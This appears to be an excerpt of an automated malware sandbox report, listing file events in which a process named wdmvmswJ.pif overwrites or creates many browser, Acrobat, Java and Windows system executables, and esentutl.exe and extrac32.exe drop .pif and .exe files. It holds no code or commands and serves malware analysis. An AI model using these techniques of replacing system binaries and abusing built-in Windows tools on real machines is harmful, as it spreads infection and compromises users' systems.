Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\wbem\WmiApSrv.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\vds.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\alg.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\snmptrap.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\Spectrum.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\Locator.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\7-Zip\7zG.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\msiexec.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\VSSVC.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\wbengine.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\SearchIndexer.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\TieringEngineService.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\AgentService.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\sppsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\SensorDataService.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\msdtc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\vds.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\snmptrap.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\Spectrum.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Windows Media Player\wmpnetwk.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\Locator.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\AppVClient.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\7-Zip\7zG.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\msiexec.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\TieringEngineService.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\user\AppData\Local\Temp\x.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Mozilla Firefox\updater.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\FXSSVC.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\sppsvc.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\SensorDataService.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\msdtc.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\wbem\WmiApSrv.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\alg.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\7-Zip\7zFM.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to dropped file
